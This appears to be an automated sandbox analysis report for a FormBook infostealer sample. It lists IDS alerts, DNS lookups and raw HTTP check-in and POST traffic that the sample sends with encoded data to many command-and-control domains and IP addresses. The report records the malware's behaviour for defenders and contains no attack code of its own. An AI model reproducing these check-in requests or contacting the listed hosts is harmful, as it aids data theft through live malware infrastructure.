            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 161.97.142.144:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 66.198.240.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 66.198.240.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 68.65.122.222:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 50.19.214.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 13.248.169.48:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.030002832.xyz
            Source: DNS query: www.pwk-24.xyz
            Source: DNS query: www.pwk-24.xyz
            Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: GET /vq3l/?Q2_4=WKR5ld2WiQxHxPDU6pm8hrTzAxfoYD+zNd+jQFHpl4y5z9MlTNWt1pAD28TX6W++2340V0NEzWPPUH5FlugQl+5D7H7BO9/OK4RESnHOQd/yty8pNcZLL2g=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.nagasl89.babyUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.abuali-contracting.artUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /5g7z/?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.godskids.storeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.030002832.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /44hl/?Q2_4=0mQqee+UGJnUA/Yx1BcY9bAABUibbqUVx0XTpT1xrmayiD/fNEmP8Z3r8TZ3vglxtN5riIpUZVEdwgctiqwj4JSuSDuD97XK84LsZQ3P19o3XG1/uWMy0C8=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.wonders8.liveUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /oy0l/?uXP=1HX8&Q2_4=vcWw5DdjdQnkJmRMu9Bv0nYhxIjg8XNP87kLKcEwcjL/VJXYlRnLhwXYdIbeiM5Wp1LHJGQmwLmzd8N63pnOImbiL9MWYGLhlQi4+Y3hzWOb/gf9Ze4XcY0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.nidedabeille.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /3qrm/?Q2_4=tyeG08MV0U64WH6unwcOXR2sJCf/xqZR+j/9sSFSjjXbCPJ8dUZ7AUStEW8oibqh5p8I6M3vE8IgylEGfxaCpffC+Ti1QKudju6yjlF7VN/fdeOaTvtkuuM=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.brunvox.siteUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /gqtu/?uXP=1HX8&Q2_4=f6Wh19Zbj3f0KGUwZR2TDfnh8ZC1kt4m9SH2+p3LnlYuxzS1qi5wc2xrbNMUplnXpMrttmRXmQTtzIwx74OUI7QZZXrSykXx07R8xuG/LilMEmUkiLjEEHk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.osi.gardenUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /yg1w/?Q2_4=B/h41wdzKHxv2H2J8JkNr9NyFguRLdtCgIEX5jqCPHbFCbPf8ZDAyvcb9g9cRq9SizS8TlHunVk6R9fe76EcgvsehxPtxmeCiZqIleDJmBUfq+mqOPWirkU=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.983743.vinUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /ppmq/?uXP=1HX8&Q2_4=KRVOuqNXYxyDgODQvejwfHP1kSw7YgglxTu2jlorf4EUTkuZz6rgp0sXDkV2rkGK77WHny3VDG/xcSWz2Ew3DtXH4m1AMWH2WLdk5ansbP7qCtZCj8eJzNQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.parkerstraus.devUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /sws3/?Q2_4=nV4LnquDqwBlA07HQ+G/v4eHjjrt+T2QZG3593DoQvpPwtJ1qSvdLT+tAqFoiYkQqMds5fxc5qEgqBHWhT8GH/u4GJVId9VOA+wH6Rzyb1bp8I1+ufyyCcg=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.mynotebook.shopUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /zut6/?Q2_4=Kt4qQSLgj4HorxpxZIZ4p+EAwKHWi+XN9OiBuCBJU5cikXkc2Sk5R2gtgSdO+P2tW+5SfoOeVCvwWIOnLXM8QNp6yDsCjrxQ3ZxiPCiDnoMvdK5RCpNRC70=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.notepad.mobiUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /7sxb/?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.hyman.lifeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /vq3l/?Q2_4=WKR5ld2WiQxHxPDU6pm8hrTzAxfoYD+zNd+jQFHpl4y5z9MlTNWt1pAD28TX6W++2340V0NEzWPPUH5FlugQl+5D7H7BO9/OK4RESnHOQd/yty8pNcZLL2g=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.nagasl89.babyUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.abuali-contracting.artUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /5g7z/?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.godskids.storeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.030002832.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /44hl/?Q2_4=0mQqee+UGJnUA/Yx1BcY9bAABUibbqUVx0XTpT1xrmayiD/fNEmP8Z3r8TZ3vglxtN5riIpUZVEdwgctiqwj4JSuSDuD97XK84LsZQ3P19o3XG1/uWMy0C8=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.wonders8.liveUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /oy0l/?uXP=1HX8&Q2_4=vcWw5DdjdQnkJmRMu9Bv0nYhxIjg8XNP87kLKcEwcjL/VJXYlRnLhwXYdIbeiM5Wp1LHJGQmwLmzd8N63pnOImbiL9MWYGLhlQi4+Y3hzWOb/gf9Ze4XcY0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.nidedabeille.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /3qrm/?Q2_4=tyeG08MV0U64WH6unwcOXR2sJCf/xqZR+j/9sSFSjjXbCPJ8dUZ7AUStEW8oibqh5p8I6M3vE8IgylEGfxaCpffC+Ti1QKudju6yjlF7VN/fdeOaTvtkuuM=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.brunvox.siteUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /gqtu/?uXP=1HX8&Q2_4=f6Wh19Zbj3f0KGUwZR2TDfnh8ZC1kt4m9SH2+p3LnlYuxzS1qi5wc2xrbNMUplnXpMrttmRXmQTtzIwx74OUI7QZZXrSykXx07R8xuG/LilMEmUkiLjEEHk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.osi.gardenUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficDNS traffic detected: DNS query: www.nagasl89.baby
            Source: global trafficDNS traffic detected: DNS query: www.abuali-contracting.art
            Source: global trafficDNS traffic detected: DNS query: www.godskids.store
            Source: global trafficDNS traffic detected: DNS query: www.030002832.xyz
            Source: global trafficDNS traffic detected: DNS query: www.wonders8.live
            Source: global trafficDNS traffic detected: DNS query: www.pwk-24.xyz
            Source: global trafficDNS traffic detected: DNS query: www.nidedabeille.net
            Source: global trafficDNS traffic detected: DNS query: www.brunvox.site
            Source: global trafficDNS traffic detected: DNS query: www.osi.garden
            Source: global trafficDNS traffic detected: DNS query: www.983743.vin
            Source: global trafficDNS traffic detected: DNS query: www.parkerstraus.dev
            Source: global trafficDNS traffic detected: DNS query: www.mynotebook.shop
            Source: global trafficDNS traffic detected: DNS query: www.bav.lat
            Source: global trafficDNS traffic detected: DNS query: www.notepad.mobi
            Source: global trafficDNS traffic detected: DNS query: www.5oxzis.top
            Source: global trafficDNS traffic detected: DNS query: www.hyman.life
            Source: unknownHTTP traffic detected: POST /ytnk/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usContent-Length: 201Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheHost: www.abuali-contracting.artOrigin: http://www.abuali-contracting.artReferer: http://www.abuali-contracting.art/ytnk/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1Data Raw: 51 32 5f 34 3d 6a 48 6f 68 30 62 34 4e 57 4b 75 43 6d 76 41 5a 74 6d 45 39 44 38 4a 47 6f 46 73 2b 2f 75 33 75 65 36 67 48 58 76 32 45 4b 61 55 6f 62 31 47 4b 74 39 47 6a 62 6f 68 4a 77 64 4e 36 49 6f 7a 66 6a 55 39 74 39 46 34 49 6a 6d 35 48 41 65 6e 37 41 66 77 36 53 6d 72 42 53 77 53 45 37 41 67 4f 6f 71 71 6d 78 76 33 42 4b 76 74 62 53 36 6e 31 63 67 33 52 5a 71 58 38 37 31 79 2b 35 50 6a 43 35 4a 49 31 66 31 4e 74 73 62 66 54 77 77 2b 37 58 4f 4c 37 47 43 70 74 67 48 6a 58 67 51 4b 78 45 39 70 53 56 73 46 63 51 2b 30 73 43 41 44 34 4c 66 54 32 46 6d 41 4e 48 56 52 71 67 76 78 33 51 51 3d 3d Data Ascii: Q2_4=jHoh0b4NWKuCmvAZtmE9D8JGoFs+/u3ue6gHXv2EKaUob1GKt9GjbohJwdN6IozfjU9t9F4Ijm5HAen7Afw6SmrBSwSE7AgOoqqmxv3BKvtbS6n1cg3RZqX871y+5PjC5JI1f1NtsbfTww+7XOL7GCptgHjXgQKxE9pSVsFcQ+0sCAD4LfT2FmANHVRqgvx3QQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:33:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xYFQ15sgg3sNfaHR7ZWbibC%2FoexqyuLJIbPFTcdmwXy%2Few4tVOYXnv4ZZsG2I9%2B%2FWCe%2Bh2euRAluH21zly4wVAC8B92TOdwqSxZ07XO2ODRBJp%2FpQn4gBzpuqRuv3tXnI1uGWA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddd8fb7b8f2726f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=104780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 30 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 2d 49 44 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6b 61 6e 57 6f 72 64 70 72 65 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 69 74 65 6d 61 70 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 73 69 74 65 6d 61 70 2e 78 6d 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 54 50 20 53 4c 4f 54 4f Data Ascii: 2099<!DOCTYPE html><html lang="id-ID"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" /><meta name="generator" content="BukanWordpress" /><link rel="icon" type="image/x-icon" href="https://www.nagasl89.baby/favicon.ico" /><link rel="sitemap" href="https://www.nagasl89.baby/sitemap.xml" /><link rel="alternate" type="application/rss+xml" title="RTP SLOTO
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:34:08 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 7f 87 29 41 29 96 d8 89 fc c5 92 5b 5e 2f 00 8f bd 58 04 be 63 2f fd 70 3e 0e dc f7 9e c6 e1 1c 30 06 76 1c c3 37 22 1f 58 3e f7 66 f6 00 f3 be 71 33 f8 2e 15 77 b5 1c 1c 0e 98 f4 9f 8c 9f 8c 19 88 10 46 67 83 d1 e0 bb 67 91 bd 38 1f 1c fe 1c 80 b1 10 80 fc 20 82 2a 71 a2 d5 6c f2 c8 8f 97 08 e3 bb 25 04 f6 64 65 07 3e 8f b8 23 db 59 fa f3 33 c1 8e 96 4f c6 d7 cb f9 b3 27 e3 b7 26 59 fe 80 e5 f7 97 de 0c 51 7d 14 78 33 e0 bd 54 18 a6 7f 02 df 37 28 e6 ad 20 cf b3 08 63 1f c5 31 38 94 46 03 14 36 60 78 b2 12 75 d9 c0 df aa 8a bf 15 89 52 74 4a b1 29 45 c9 9f 65 2b a1 b0 57 d9 00 3b 07 79 7e d2 17 3e 11 49 46 f1 ed 68 27 d6 ab e8 8a 02 90 4b 02 50 ec 02 bb 12 47 2f 1a fd 36 89 6b a7 f0 3c 45 3c 11 b4 a0 70 15 f7 e6 ac c0 d3 17 45 ae 3e 8b ce ec b9 ff 25 29 e9 26 95 1a 96 f3 15 eb 92 6a 4b 36 19 c5 c4 8a 62 e5 d5 ab da 5c e1 45 2d 70 2a 17 34 c1 cc bf b2 14 d9 86 52 5c 8f b5 2f 12 20 15 a6 ea 79 d6 24 93 c6 e5 e5 cb 76 ae 51 6a 51 8b 18 5d 45 b5 93 a7 f9 e7 04 d4 2c a8 a3 91 a3 13 9d b6 cc 46 21 5d ef 93 ad c6 a6 62 b4 80 16 db 40 91 a4 44 76 05 b2 9b ca 51 0a 28 b4 02 79 ad 84 39 39 79 8a 52 10 68 49 26 d3 62 6e b3 26 44 b5 8e d6 a3 dc 05 de 37 c9 9d 94 ea 55 99 4f 70 30 25 53 e4 b6 b2 0b 32 60 52 96 dd 42 6e b5 ae 2f 45 c9 6a 35 7c ec 73 42 78 a1 ca Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:34:11 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 